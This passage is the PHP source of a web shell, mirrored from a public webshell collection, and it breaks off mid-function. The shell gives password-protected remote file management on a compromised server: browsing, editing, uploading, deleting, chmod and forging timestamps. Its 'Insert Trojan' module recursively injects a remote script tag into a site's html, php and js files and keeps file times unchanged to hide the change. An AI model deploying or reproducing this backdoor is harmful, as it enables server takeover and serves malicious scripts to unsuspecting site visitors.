mirror of
https://github.com/tennc/webshell
synced 2024-11-22 19:23:05 +00:00
2557 lines
148 KiB
PHP
2557 lines
148 KiB
PHP
|
<?php
|
|||
|
|
$password = "admin!@#";//change password here
|
|||
|
|
error_reporting(E_ERROR);
|
|||
|
|
set_time_limit(0);
|
|||
|
|
$lanip = getenv('REMOTE_ADDR');
|
|||
|
|
|
|||
|
|
function Root_GP(&$array)
|
|||
|
|
{
|
|||
|
|
while(list($key,$var) = each($array))
|
|||
|
|
{
|
|||
|
|
if((strtoupper($key) != $key || ''.intval($key) == "$key") && $key != 'argc' && $key != 'argv')
|
|||
|
|
{
|
|||
|
|
if(is_string($var)) $array[$key] = stripslashes($var);
|
|||
|
|
if(is_array($var)) $array[$key] = Root_GP($var);
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
return $array;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function Root_CSS()
|
|||
|
|
{
|
|||
|
|
print<<<END
|
|||
|
|
<style type="text/css">
|
|||
|
|
*{padding:0; margin:0;}
|
|||
|
|
body{background:threedface;font-family:"Verdana", "Tahoma", sans-serif; font-size:13px;margin-top:3px;margin-bottom:3px;table-layout:fixed;word-break:break-all;}
|
|||
|
|
a{color:#000000;text-decoration:none;}
|
|||
|
|
a:hover{background:#33FF33;}
|
|||
|
|
table{color:#000000;font-family:"Verdana", "Tahoma", sans-serif;font-size:13px;border:1px solid #999999;}
|
|||
|
|
td{background:#F9F6F4;}
|
|||
|
|
.bt{background:#3d3d3d;color:#ffffff;border:2px;font:13px Arial,Tahoma;height:22px;}
|
|||
|
|
.toptd{background:threedface; width:310px; border-color:#FFFFFF #999999 #999999 #FFFFFF; border-style:solid;border-width:1px;}
|
|||
|
|
.msgbox{background:#FFFFE0;color:#FF0000;height:25px;font-size:12px;border:1px solid #999999;text-align:center;padding:3px;clear:both;}
|
|||
|
|
.actall{background:#F9F6F4;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;}
|
|||
|
|
</style>\n
|
|||
|
|
END;
|
|||
|
|
return false;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
//file manager
|
|||
|
|
function File_Str($string)
|
|||
|
|
{
|
|||
|
|
return str_replace('//','/',str_replace('\\','/',$string));
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function File_Size($size)
|
|||
|
|
{
|
|||
|
|
if($size > 1073741824) $size = round($size / 1073741824 * 100) / 100 . ' G';
|
|||
|
|
elseif($size > 1048576) $size = round($size / 1048576 * 100) / 100 . ' M';
|
|||
|
|
elseif($size > 1024) $size = round($size / 1024 * 100) / 100 . ' K';
|
|||
|
|
else $size = $size . ' B';
|
|||
|
|
return $size;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function File_Mode()
|
|||
|
|
{
|
|||
|
|
$RealPath = realpath('./');
|
|||
|
|
$SelfPath = $_SERVER['PHP_SELF'];
|
|||
|
|
$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/'));
|
|||
|
|
return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function File_Read($filename)
|
|||
|
|
{
|
|||
|
|
$handle = @fopen($filename,"rb");
|
|||
|
|
$filecode = @fread($handle,@filesize($filename));
|
|||
|
|
@fclose($handle);
|
|||
|
|
return $filecode;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function File_Write($filename,$filecode,$filemode)
|
|||
|
|
{
|
|||
|
|
$handle = @fopen($filename,$filemode);
|
|||
|
|
$key = @fwrite($handle,$filecode);
|
|||
|
|
if(!$key)
|
|||
|
|
{
|
|||
|
|
@chmod($filename,0666);
|
|||
|
|
$key = @fwrite($handle,$filecode);
|
|||
|
|
}
|
|||
|
|
@fclose($handle);
|
|||
|
|
return $key;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function File_Up($filea,$fileb)
|
|||
|
|
{
|
|||
|
|
$key = @copy($filea,$fileb) ? true : false;
|
|||
|
|
if(!$key) $key = @move_uploaded_file($filea,$fileb) ? true : false;
|
|||
|
|
return $key;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function File_Down($filename)
|
|||
|
|
{
|
|||
|
|
if(!file_exists($filename)) return false;
|
|||
|
|
$filedown = basename($filename);
|
|||
|
|
$array = explode('.', $filedown);
|
|||
|
|
$arrayend = array_pop($array);
|
|||
|
|
header('Content-type: application/x-'.$arrayend);
|
|||
|
|
header('Content-Disposition: attachment; filename='.$filedown);
|
|||
|
|
header('Content-Length: '.filesize($filename));
|
|||
|
|
@readfile($filename);
|
|||
|
|
exit;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function File_Deltree($deldir)
|
|||
|
|
{
|
|||
|
|
if(($mydir = @opendir($deldir)) == NULL) return false;
|
|||
|
|
while(false !== ($file = @readdir($mydir)))
|
|||
|
|
{
|
|||
|
|
$name = File_Str($deldir.'/'.$file);
|
|||
|
|
if((is_dir($name)) && ($file!='.') && ($file!='..')){@chmod($name,0777);rmdir($name);}
|
|||
|
|
if(is_file($name)){@chmod($name,0777);@unlink($name);}
|
|||
|
|
}
|
|||
|
|
@closedir($mydir);
|
|||
|
|
@chmod($deldir,0777);
|
|||
|
|
return @rmdir($deldir) ? true : false;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function File_Act($array,$actall,$inver)
|
|||
|
|
{
|
|||
|
|
if(($count = count($array)) == 0) return 'select file plz';
|
|||
|
|
$i = 0;
|
|||
|
|
while($i < $count)
|
|||
|
|
{
|
|||
|
|
$array[$i] = urldecode($array[$i]);
|
|||
|
|
switch($actall)
|
|||
|
|
{
|
|||
|
|
case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return 'path error'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = 'copy'; break;
|
|||
|
|
case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = 'del'; break;
|
|||
|
|
case "c" : if(!eregi("^[0-7]{4}$",$inver)) return 'wrong attr value'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = 'change attr'; break;
|
|||
|
|
case "d" : @touch($array[$i],strtotime($inver)); $msg = 'change time'; break;
|
|||
|
|
}
|
|||
|
|
$i++;
|
|||
|
|
}
|
|||
|
|
return 'select files '.$msg.' done';
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function File_Edit($filepath,$filename,$dim = '')
|
|||
|
|
{
|
|||
|
|
$THIS_DIR = urlencode($filepath);
|
|||
|
|
$THIS_FILE = File_Str($filepath.'/'.$filename);
|
|||
|
|
if(file_exists($THIS_FILE)){$FILE_TIME = @date('Y-m-d H:i:s',filemtime($THIS_FILE));$FILE_CODE = htmlspecialchars(File_Read($THIS_FILE));}
|
|||
|
|
else {$FILE_TIME = @date('Y-m-d H:i:s',time());$FILE_CODE = '';}
|
|||
|
|
print<<<END
|
|||
|
|
<script language="javascript">
|
|||
|
|
var NS4 = (document.layers);
|
|||
|
|
var IE4 = (document.all);
|
|||
|
|
var win = this;
|
|||
|
|
var n = 0;
|
|||
|
|
function search(str){
|
|||
|
|
var txt, i, found;
|
|||
|
|
if(str == "")return false;
|
|||
|
|
if(NS4){
|
|||
|
|
if(!win.find(str)) while(win.find(str, false, true)) n++; else n++;
|
|||
|
|
if(n == 0) alert(str + " ... Not-Find")
|
|||
|
|
}
|
|||
|
|
if(IE4){
|
|||
|
|
txt = win.document.body.createTextRange();
|
|||
|
|
for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){
|
|||
|
|
txt.moveStart("character", 1);
|
|||
|
|
txt.moveEnd("textedit")
|
|||
|
|
}
|
|||
|
|
if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}
|
|||
|
|
else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}
|
|||
|
|
}
|
|||
|
|
return false
|
|||
|
|
}
|
|||
|
|
function CheckDate(){
|
|||
|
|
var re = document.getElementById('mtime').value;
|
|||
|
|
var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/;
|
|||
|
|
var r = re.match(reg);
|
|||
|
|
if(r==null){alert('wrong time!format:yyyy-mm-dd hh:mm:ss');return false;}
|
|||
|
|
else{document.getElementById('editor').submit();}
|
|||
|
|
}
|
|||
|
|
</script>
|
|||
|
|
<div class="actall">search content: <input name="searchs" type="text" value="{$dim}" style="width:500px;">
|
|||
|
|
<input type='button' value="search" onclick="search(searchs.value)"></div>
|
|||
|
|
<form method="POST" id="editor" action="?s=a&p={$THIS_DIR}">
|
|||
|
|
<div class="actall"><input type="text" name="pfn" value="{$THIS_FILE}" style="width:750px;"></div>
|
|||
|
|
<div class="actall"><textarea name="pfc" style="width:750px;height:380px;">{$FILE_CODE}</textarea></div>
|
|||
|
|
<div class="actall">change file time <input type="text" name="mtime" id="mtime" value="{$FILE_TIME}" style="width:150px;"></div>
|
|||
|
|
<div class="actall"><input class="bt" type="button" value="save" onclick="CheckDate();">
|
|||
|
|
<input class="bt" type="button" value="back" onclick="window.location='?s=a&p={$THIS_DIR}';"></div>
|
|||
|
|
</form>
|
|||
|
|
END;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
|
|||
|
|
function File_a($p)
|
|||
|
|
{
|
|||
|
|
$MSG_BOX = 'waiting for message queue......';
|
|||
|
|
if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/';
|
|||
|
|
$UP_DIR = urlencode(File_Str($p.'/..'));
|
|||
|
|
$REAL_DIR = File_Str(realpath($p));
|
|||
|
|
$FILE_DIR = File_Str(dirname(__FILE__));
|
|||
|
|
$ROOT_DIR = File_Mode();
|
|||
|
|
$THIS_DIR = urlencode(File_Str($p));
|
|||
|
|
$UP_DIR = urlencode(File_Str(dirname($p)));
|
|||
|
|
$NUM_D = 0;
|
|||
|
|
$NUM_F = 0;
|
|||
|
|
if(!empty($_POST['pfn'])){$intime = @strtotime($_POST['mtime']);$MSG_BOX = File_Write($_POST['pfn'],$_POST['pfc'],'wb') ? 'edit file '.$_POST['pfn'].' success' : 'edit file '.$_POST['pfn'].' faild';@touch($_POST['pfn'],$intime);}
|
|||
|
|
if(!empty($_POST['ufs'])){if($_POST['ufn'] != '') $upfilename = $_POST['ufn']; else $upfilename = $_FILES['ufp']['name'];$MSG_BOX = File_Up($_FILES['ufp']['tmp_name'],File_Str($p.'/'.$upfilename)) ? 'upfile '.$upfilename.' success' : 'upfile '.$upfilename.' ʧ<><CAA7>';}
|
|||
|
|
if(!empty($_POST['actall'])){$MSG_BOX = File_Act($_POST['files'],$_POST['actall'],$_POST['inver']);}
|
|||
|
|
if(!empty($_GET['mn'])){$MSG_BOX = @rename(File_Str($p.'/'.$_GET['mn']),File_Str($p.'/'.$_GET['rn'])) ? 'rename '.$_GET['mn'].' to '.$_GET['rn'].' success' : 'rename '.$_GET['mn'].' to '.$_GET['rn'].' faild';}
|
|||
|
|
if(!empty($_GET['dn'])){$MSG_BOX = @mkdir(File_Str($p.'/'.$_GET['dn']),0777) ? 'create folder '.$_GET['dn'].' success' : 'create folder '.$_GET['dn'].' faild';}
|
|||
|
|
if(!empty($_GET['dd'])){$MSG_BOX = File_Deltree($_GET['dd']) ? 'del folder '.$_GET['dd'].' success' : 'del folder '.$_GET['dd'].' faild';}
|
|||
|
|
if(!empty($_GET['df'])){if(!File_Down($_GET['df'])) $MSG_BOX = 'the download file does not exists';}
|
|||
|
|
Root_CSS();
|
|||
|
|
print<<<END
|
|||
|
|
<script type="text/javascript">
|
|||
|
|
function Inputok(msg,gourl)
|
|||
|
|
{
|
|||
|
|
smsg = "current file:[" + msg + "]";
|
|||
|
|
re = prompt(smsg,unescape(msg));
|
|||
|
|
if(re)
|
|||
|
|
{
|
|||
|
|
var url = gourl + escape(re);
|
|||
|
|
window.location = url;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
function Delok(msg,gourl)
|
|||
|
|
{
|
|||
|
|
smsg = "sure for del [" + unescape(msg) + "] ?";
|
|||
|
|
if(confirm(smsg))
|
|||
|
|
{
|
|||
|
|
if(gourl == 'b'){document.getElementById('actall').value = escape(gourl);document.getElementById('fileall').submit();}
|
|||
|
|
else window.location = gourl;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
function CheckDate(msg,gourl)
|
|||
|
|
{
|
|||
|
|
smsg = "current file time:[" + msg + "]";
|
|||
|
|
re = prompt(smsg,msg);
|
|||
|
|
if(re)
|
|||
|
|
{
|
|||
|
|
var url = gourl + re;
|
|||
|
|
var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/;
|
|||
|
|
var r = re.match(reg);
|
|||
|
|
if(r==null){alert('time error!format:yyyy-mm-dd hh:mm:ss');return false;}
|
|||
|
|
else{document.getElementById('actall').value = gourl; document.getElementById('inver').value = re; document.getElementById('fileall').submit();}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
function CheckAll(form)
|
|||
|
|
{
|
|||
|
|
for(var i=0;i<form.elements.length;i++)
|
|||
|
|
{
|
|||
|
|
var e = form.elements[i];
|
|||
|
|
if (e.name != 'chkall')
|
|||
|
|
e.checked = form.chkall.checked;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
function SubmitUrl(msg,txt,actid)
|
|||
|
|
{
|
|||
|
|
re = prompt(msg,unescape(txt));
|
|||
|
|
if(re)
|
|||
|
|
{
|
|||
|
|
document.getElementById('actall').value = actid;
|
|||
|
|
document.getElementById('inver').value = escape(re);
|
|||
|
|
document.getElementById('fileall').submit();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
</script>
|
|||
|
|
<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
|
|||
|
|
<div class="actall" style="text-align:center;padding:3px;">
|
|||
|
|
<form method="GET"><input type="hidden" name="s" value="a">
|
|||
|
|
<input type="text" name="p" value="{$p}" style="width:50%;height:22px;">
|
|||
|
|
<select onchange="location.href='?s=a&p='+options[selectedIndex].value">
|
|||
|
|
<option>---some folder---</option>
|
|||
|
|
<option value="{$ROOT_DIR}"> site root folder </option>
|
|||
|
|
<option value="{$FILE_DIR}"> current folder </option>
|
|||
|
|
<option value="C:/Documents and Settings/All Users/<2F><><EFBFBD><EFBFBD>ʼ<EFBFBD><CABC><EFBFBD>˵<EFBFBD>/<2F><><EFBFBD><EFBFBD>/<2F><><EFBFBD><EFBFBD>"> start item (cn) </option>
|
|||
|
|
<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup"> start item (en) </option>
|
|||
|
|
<option value="C:/RECYCLER"> RECYCLER </option>
|
|||
|
|
<option value="C:/Program Files"> Program Files </option>
|
|||
|
|
</select> <input class="bt" type="submit" value="jump"></form>
|
|||
|
|
<div style="margin-top:3px;"></div>
|
|||
|
|
<form method="POST" action="?s=a&p={$THIS_DIR}" enctype="multipart/form-data">
|
|||
|
|
<input class="bt" type="button" value="Create File" onclick="Inputok('newfile.php','?s=p&fp={$THIS_DIR}&fn=');">
|
|||
|
|
<input class="bt" type="button" value="Create Folder" onclick="Inputok('newdir','?s=a&p={$THIS_DIR}&dn=');">
|
|||
|
|
<input type="file" name="ufp" style="width:30%;height:22px;">
|
|||
|
|
<input type="text" name="ufn" style="width:20%;height:22px;">
|
|||
|
|
<input class="bt" type="submit" name="ufs" value="upfile">
|
|||
|
|
</form>
|
|||
|
|
</div>
|
|||
|
|
<form method="POST" id="fileall" action="?s=a&p={$THIS_DIR}">
|
|||
|
|
<table border="0"><tr>
|
|||
|
|
<td class="toptd" style="width:810px;"> <a href="?s=a&p={$UP_DIR}"><b>parent directory</b></a> </td>
|
|||
|
|
<td class="toptd" style="width:100px;"> opertion </td>
|
|||
|
|
<td class="toptd" style="width:60px;"> attr </td>
|
|||
|
|
<td class="toptd" style="width:200px;"> time </td>
|
|||
|
|
<td class="toptd" style="width:100px;"> size </td></tr>
|
|||
|
|
END;
|
|||
|
|
if(($h_d = @opendir($p)) == NULL) return false;
|
|||
|
|
while(false !== ($Filename = @readdir($h_d)))
|
|||
|
|
{
|
|||
|
|
if($Filename == '.' or $Filename == '..') continue;
|
|||
|
|
$Filepath = File_Str($p.'/'.$Filename);
|
|||
|
|
if(is_dir($Filepath))
|
|||
|
|
{
|
|||
|
|
$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);
|
|||
|
|
$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));
|
|||
|
|
$Filepath = urlencode($Filepath);
|
|||
|
|
echo "\n".'<tr><td><a href="?s=a&p='.$Filepath.'"><font face="wingdings" size="3">0</font><b>'.$Filename.'</b></a></td>';
|
|||
|
|
$Filename = urlencode($Filename);
|
|||
|
|
echo '<td><a href="#" onclick="Delok(\''.$Filename.'\',\'?s=a&p='.$THIS_DIR.'&dd='.$Filename.'\');return false;">Del</a> ';
|
|||
|
|
echo '<a href="#" onclick="Inputok(\''.$Filename.'\',\'?s=a&p='.$THIS_DIR.'&mn='.$Filename.'&rn=\');return false;">Rename</a></td>';
|
|||
|
|
echo '<td><a href="#" onclick="Inputok(\''.$Fileperm.'\',\'?s=a&p='.$THIS_DIR.'&mk='.$Filename.'&md=\');return false;">'.$Fileperm.'</a></td>';
|
|||
|
|
echo '<td>'.$Filetime.'</td> ';
|
|||
|
|
echo '<td> </td></tr>'."\n";
|
|||
|
|
$NUM_D++;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
@rewinddir($h_d);
|
|||
|
|
while(false !== ($Filename = @readdir($h_d)))
|
|||
|
|
{
|
|||
|
|
if($Filename == '.' or $Filename == '..') continue;
|
|||
|
|
$Filepath = File_Str($REAL_DIR.'/'.$Filename);
|
|||
|
|
if(!is_dir($Filepath))
|
|||
|
|
{
|
|||
|
|
$Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$Filepath);
|
|||
|
|
$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);
|
|||
|
|
$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));
|
|||
|
|
$Filesize = File_Size(@filesize($Filepath));
|
|||
|
|
if($Filepath == File_Str(__FILE__)) $fname = '<font color="#FF0000">'.$Filename.'</font>'; else $fname = $Filename;
|
|||
|
|
echo "\r\n".' <tr><td> <input type="checkbox" name="files[]" value="'.urlencode($Filepath).'"><a target="_blank" href="'.$Fileurls.'">'.$fname.'</a> </td>';
|
|||
|
|
$Filepath = urlencode($Filepath);
|
|||
|
|
$Filename = urlencode($Filename);
|
|||
|
|
echo ' <td> <a href="?s=p&fp='.$THIS_DIR.'&fn='.$Filename.'"> Edit </a> ';
|
|||
|
|
echo ' <a href="#" onclick="Inputok(\''.$Filename.'\',\'?s=a&p='.$THIS_DIR.'&mn='.$Filename.'&rn=\');return false;"> Rename </a> </td>';
|
|||
|
|
echo ' <td>'.$Fileperm.'</td> ';
|
|||
|
|
echo ' <td>'.$Filetime.'</td> ';
|
|||
|
|
echo ' <td align="right"> <a href="?s=a&df='.$Filepath.'">'.$Filesize.'</a> </td></tr> '."\r\n";
|
|||
|
|
$NUM_F++;
|
|||
|
|
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
@closedir($h_d);
|
|||
|
|
print<<<END
|
|||
|
|
</table>
|
|||
|
|
<div class="actall"><input type="hidden" name="actall" value="undefined">
|
|||
|
|
<input type="hidden" name="inver" value="undefined">
|
|||
|
|
<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);">
|
|||
|
|
<input class="bt" type="button" value="Copy" onclick="SubmitUrl('copy selected files to folder: ','{$THIS_DIR}','a');return false;">
|
|||
|
|
<input class="bt" type="button" value="Del" onclick="Delok('selected files','b');return false;">
|
|||
|
|
<input class="bt" type="button" value="Attr" onclick="SubmitUrl('change selected files attr value: ','0666','c');return false;">
|
|||
|
|
<input class="bt" type="button" value="Time" onclick="CheckDate('2010-04-21 17:31:20','d');return false;">
|
|||
|
|
folders({$NUM_D}) / files({$NUM_F})</div>
|
|||
|
|
</form>
|
|||
|
|
END;
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
|
|||
|
|
//Insert Trojan
|
|||
|
|
function Guama_Pass($length)
|
|||
|
|
{
|
|||
|
|
$possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
|
|||
|
|
$str = "";
|
|||
|
|
while(strlen($str) < $length) $str .= substr($possible,(rand() % strlen($possible)),1);
|
|||
|
|
return $str;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function Guama_Auto($gp,$gt,$gl,$gc,$incode,$gk,$gd,$gb,$go)
|
|||
|
|
{
|
|||
|
|
if(($h_d = @opendir($gp)) == NULL) return false;
|
|||
|
|
if($go)
|
|||
|
|
{
|
|||
|
|
preg_match_all("/\[\-([^~]*?)\-\]/i",$gc,$nc);
|
|||
|
|
$passm = (int)$nc[1][0];
|
|||
|
|
if((!eregi("^[0-9]{1,2}$",$nc[1][0])) || ($passm > 12)) return false;
|
|||
|
|
}
|
|||
|
|
while(false !== ($Filename = @readdir($h_d)))
|
|||
|
|
{
|
|||
|
|
if($Filename == '.' || $Filename == '..') continue;
|
|||
|
|
if($gl != ''){if(eregi($gl,$Filename)) continue;}
|
|||
|
|
$Filepath = File_Str($gp.'/'.$Filename);
|
|||
|
|
if(is_dir($Filepath) && $gb) Guama_Auto($Filepath,$gt,$gl,$gc,$incode,$gk,$gd,$gb,$go);
|
|||
|
|
if(eregi($gt,$Filename))
|
|||
|
|
{
|
|||
|
|
$ic = File_Read($Filepath);
|
|||
|
|
if(stristr($ic,$gk)) continue;
|
|||
|
|
if($go) $gc = str_replace($nc[0][0],Guama_Pass($passm),$gc);
|
|||
|
|
if($gd) $ftime = @filemtime($Filepath);
|
|||
|
|
if($incode == '1'){if(!stristr($ic,'</head>')) continue; $ic = str_replace('</head>',"\r\n".$gc."\r\n".'</head>'."\r\n",$ic); $ic = str_replace('</HEAD>',"\r\n".$gc."\r\n".'</HEAD>'."\r\n",$ic);}
|
|||
|
|
if($incode == '2') $ic = $gc."\r\n".$ic;
|
|||
|
|
if($incode == '3') $ic = $ic."\r\n".$gc;
|
|||
|
|
echo File_Write($Filepath,$ic,'wb') ? 'ok:'.$Filepath.'<br>'."\r\n" : 'err:'.$Filepath.'<br>'."\r\n";
|
|||
|
|
if($gd) @touch($Filepath,$ftime);
|
|||
|
|
ob_flush();
|
|||
|
|
flush();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
@closedir($h_d);
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function Guama_b()
|
|||
|
|
{
|
|||
|
|
if((!empty($_POST['gp'])) && (!empty($_POST['gt'])) && (!empty($_POST['gc'])))
|
|||
|
|
{
|
|||
|
|
$gk = '';
|
|||
|
|
$go = false;
|
|||
|
|
$gt = str_replace('.','\\.',$_POST['gt']);
|
|||
|
|
$gl = isset($_POST['gl']) ? str_replace('.','\\.',$_POST['gl']) : '';
|
|||
|
|
$gd = isset($_POST['gd']) ? true : false;
|
|||
|
|
$gb = ($_POST['gb'] == 'a') ? true : false;
|
|||
|
|
if(isset($_POST['gx'])){$gk = $_POST['gc'];if(stristr($_POST['gc'],'[-') && stristr($_POST['gc'],'-]')){$temp = explode('[-',$_POST['gc']); $gk = $temp[0]; $go = true;}}
|
|||
|
|
echo Guama_Auto($_POST['gp'],$gt,$gl,$_POST['gc'],$_POST['incode'],$gk,$gd,$gb,$go) ? 'Done' : 'Abort';
|
|||
|
|
echo '<br><input class="bt" type="button" value="back" onclick="history.back();">';
|
|||
|
|
return false;
|
|||
|
|
}
|
|||
|
|
$FILE_DIR = File_Str(dirname(__FILE__));
|
|||
|
|
$ROOT_DIR = File_Mode();
|
|||
|
|
print<<<END
|
|||
|
|
<script language="javascript">
|
|||
|
|
function Fulll(i){
|
|||
|
|
if(i==0) return false;
|
|||
|
|
Str = new Array(5);
|
|||
|
|
if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";sform.gp.value = Str[i];}
|
|||
|
|
else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";sform.gt.value = Str[i];}
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
function autorun(){
|
|||
|
|
if(document.getElementById('gp').value == ''){alert('path can not be empty');return false;}
|
|||
|
|
if(document.getElementById('gt').value == ''){alert('type can not be empty');return false;}
|
|||
|
|
if(document.getElementById('gc').value == ''){alert('code can not be empty');return false;}
|
|||
|
|
document.getElementById('sform').submit();
|
|||
|
|
}
|
|||
|
|
</script>
|
|||
|
|
<form method="POST" name="sform" id="sform" action="?s=b">
|
|||
|
|
<div class="actall" style="height:35px;">Path: <input type="text" name="gp" id="gp" value="{$ROOT_DIR}" style="width:500px;">
|
|||
|
|
<select onchange='return Fulll(options[selectedIndex].value)'>
|
|||
|
|
<option value="0" selected>--select range--</option>
|
|||
|
|
<option value="1">site root folder</option>
|
|||
|
|
<option value="2">current folder</option>
|
|||
|
|
</select></div>
|
|||
|
|
<div class="actall" style="height:35px;">Type: <input type="text" name="gt" id="gt" value=".htm|.html|.shtml" style="width:500px;">
|
|||
|
|
<select onchange='return Fulll(options[selectedIndex].value)'>
|
|||
|
|
<option value="0" selected>--select type--</option>
|
|||
|
|
<option value="3">html</option>
|
|||
|
|
<option value="4">script+html</option>
|
|||
|
|
<option value="5">JS</option>
|
|||
|
|
</select></div>
|
|||
|
|
<div class="actall" style="height:35px;">Filter: <input type="text" name="gl" value="templet|templets|default|editor|fckeditor.html" style="width:500px;" disabled>
|
|||
|
|
<input type="radio" name="inout" onclick="gl.disabled=false;">Open <input type="radio" name="inout" onclick="gl.disabled=true;" checked>Close</div>
|
|||
|
|
<div class="actall">Insert Code: <textarea name="gc" id="gc" style="width:610px;height:180px;"><script language=javascript src="http://www.baidu.com/ad.js?[-6-]"></script></textarea>
|
|||
|
|
<div class="msgbox"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˵<EFBFBD><EFBFBD>: <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Զ<EFBFBD>Ѱ<EFBFBD><EFBFBD>[-6-]<EFBFBD><EFBFBD>ǩ,<EFBFBD>滻Ϊ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ַ<EFBFBD>,6<EFBFBD><EFBFBD>ʾ<EFBFBD><EFBFBD>λ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ַ<EFBFBD>,<EFBFBD><EFBFBD><EFBFBD><EFBFBD>12λ,<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ο<EFBFBD><EFBFBD>Բ<EFBFBD><EFBFBD><EFBFBD>[-6-]<EFBFBD><EFBFBD>ǩ.
|
|||
|
|
<br>Example: <script language=javascript src="http://www.baidu.com/ad.js?EMTDSU"></script></div></div>
|
|||
|
|
<div class="actall" style="height:35px;"><input type="radio" name="incode" value="1" checked>insert before </head>
|
|||
|
|
<input type="radio" name="incode" value="2">insert the top of file
|
|||
|
|
<input type="radio" name="incode" value="3">insert the end of file</div>
|
|||
|
|
<div class="actall" style="height:30px;"><input type="checkbox" name="gx" value="1" checked>Automatic filter double code <input type="checkbox" name="gd" value="1" checked>keep file time unchanged</div>
|
|||
|
|
<div class="actall" style="height:50px;"><input type="radio" name="gb" value="a" checked>applied to current folder,subfolders and files
|
|||
|
|
<br><input type="radio" name="gb" value="b">only applied to current folder</div>
|
|||
|
|
<div class="actall"><input class="bt" type="button" value="Insert" onclick="autorun();"></div>
|
|||
|
|
</form>
|
|||
|
|
END;
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
//clean code
|
|||
|
|
|
|||
|
|
function Qingma_Auto($qp,$qt,$qc,$qd,$qb)
|
|||
|
|
{
|
|||
|
|
if(($h_d = @opendir($qp)) == NULL) return false;
|
|||
|
|
while(false !== ($Filename = @readdir($h_d)))
|
|||
|
|
{
|
|||
|
|
if($Filename == '.' || $Filename == '..') continue;
|
|||
|
|
$Filepath = File_Str($qp.'/'.$Filename);
|
|||
|
|
if(is_dir($Filepath) && $qb) Qingma_Auto($Filepath,$qt,$qc,$qd,$qb);
|
|||
|
|
if(eregi($qt,$Filename))
|
|||
|
|
{
|
|||
|
|
$ic = File_Read($Filepath);
|
|||
|
|
if(!stristr($ic,$qc)) continue;
|
|||
|
|
$ic = str_replace($qc,'',$ic);
|
|||
|
|
if($qd) $ftime = @filemtime($Filepath);
|
|||
|
|
echo File_Write($Filepath,$ic,'wb') ? 'ok:'.$Filepath.'<br>'."\r\n" : 'err:'.$Filepath.'<br>'."\r\n";
|
|||
|
|
if($qd) @touch($Filepath,$ftime);
|
|||
|
|
ob_flush();
|
|||
|
|
flush();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
@closedir($h_d);
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function Qingma_c()
|
|||
|
|
{
|
|||
|
|
if((!empty($_POST['qp'])) && (!empty($_POST['qt'])) && (!empty($_POST['qc'])))
|
|||
|
|
{
|
|||
|
|
$qt = str_replace('.','\\.',$_POST['qt']);
|
|||
|
|
$qd = isset($_POST['qd']) ? true : false;
|
|||
|
|
$qb = ($_POST['qb'] == 'a') ? true : false;
|
|||
|
|
